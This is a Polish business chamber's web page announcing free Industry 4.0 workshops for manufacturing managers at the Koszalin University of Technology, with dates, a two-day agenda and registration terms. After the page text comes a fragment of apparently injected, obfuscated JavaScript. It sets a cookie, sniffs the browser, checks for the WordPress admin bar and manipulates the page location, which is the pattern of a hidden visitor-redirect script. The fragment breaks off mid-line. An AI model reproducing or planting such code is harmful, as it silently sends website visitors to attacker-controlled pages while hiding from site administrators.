Przemysł 4.0 – warsztat dla menadżerów przedsiębiorstw | Północna Izba Gospodarcza w Koszalinie

Celem warsztatów jest prezentacja koncepcji Przemysłu 4.0 oraz wymiana  doświadczeń związanych z procesem cyfryzacji przedsiębiorstw produkcyjnych. Podczas warsztatów uczestnikom zostaną zaprezentowane zagadnienia technologiczne i organizacyjne w ujęciu teoretycznym i praktycznym połączone z prezentacja praktycznych zastosowań w biznesie.

Warsztaty prowadzone będą przez osoby posiadające doświadczenie praktyczne.

Warsztaty odbywają się na Politechnice Koszalińskiej, ul. Śniadeckich 2 w ponizszych terminach:

25-26 listopada
28-29 listopada
3-4 grudnia

Agenda

3 grudnia 2019

Godzina Zakres tematyczny
9.00-9.45 Wprowadzenie do Przemysłu 4.0.
9.45-10.00 Wirtualna i rozszerzona rzeczywistość
10.00-10.15 Przerwa kawowa
10.15-10.30 Sztuczna inteligencja (AI) Uczenie maszynowe
10.30-10.45 Block-chain w przemyśle i zastosowanie łańcucha dostaw
10.45-11.00 Komunikacja V2X
11.00-11.15 Cloud Computing w przemyśle
11.15-11.30 Przemysłowy Internet Rzeczy w tym technologie bezprzewodowe (RFID, NFC), sensoryka
11.30-11.45 Wytwarzanie przyrostowe, druk 3D
11.45-12.00 Przerwa kawowa
12.00-12.15 Symulacja komputerowa w fabryce (Digital Twin)
12.15-12.30 Integracja danych w łańcuchu wartości
12.30-12.50 End to end engineering
12.50-13.30 Przerwa obiadowa
13.30-17.45 Część demonstracyjna
18.00-20.00 Forum wymiany myśli

4 grudnia 2019

Godzina Zakres tematyczny
9.00-9.45 Modele biznesowe dla Przemysłu 4.0
9.45-10.30 Inteligentny produkt
10.30-10.45 Przerwa kawowa
10.45-11.30 End to end engineering
11.30-12.10 Integracja wertykalna i horyzontalna łańcucha wartości
12.10-12.45 Inteligentny łańcuch dostaw
12.45-13.30 Inteligentne systemy zarządzania danymi w firmie dla Przemysłu 4.0. – ERP,BI
13.30-13.45 Przerwa kawowa
13.45-14.25 Rola klienta i marketing w firmach produkcyjnych
14.25-15.20 Mapa drogowa dla Przemysłu 4.0
15.20-15.30 Podsumowanie i zakończenie spotkania
15.30-16.00 Obiad

Warunki uczestnictwa

Warsztaty skierowane są do kadry zarządzającej przedsiębiorstw produkcyjnych w szczególności z sektora MŚP.

O możliwości udziału decyduje kolejność zgłoszenia. Liczba miejsc jest ograniczona do 20.

Warsztaty są bezpłatne.

Udział w warsztatach wiąże się z koniecznością wypełnienia ankiety ewaluacyjnej. Ankiety zostaną udostępnione na zakończenie warsztatów. Dla Państwa wygody ankiety zostaną przesłane na adres email podany w trakcie rejestracji.

Więcej informacji oraz formularz rejestracyjny: https://przemyslprzyszlosci.gov.pl/wydarzenia

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m